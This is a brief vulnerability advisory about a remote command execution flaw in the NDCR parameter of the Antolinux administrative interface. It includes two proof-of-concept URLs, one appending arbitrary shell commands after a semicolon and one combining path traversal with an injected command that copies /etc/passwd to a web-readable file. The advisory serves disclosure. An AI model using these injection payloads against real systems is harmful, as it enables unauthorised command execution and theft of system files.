Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability

Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability

No exploit is required.

The following proof of concept examples have been supplied:
http://www.example.com/dns/ndcr.php?NDCR=anything;[arbritary commands]
http://www.example.com/libs/calendrier.php?lng=../../../../../../../../../home/web/ISA/htdocs/wmi/dns/ndcr&NDCR=foo ;cat /etc/passwd > lostnoobs.txt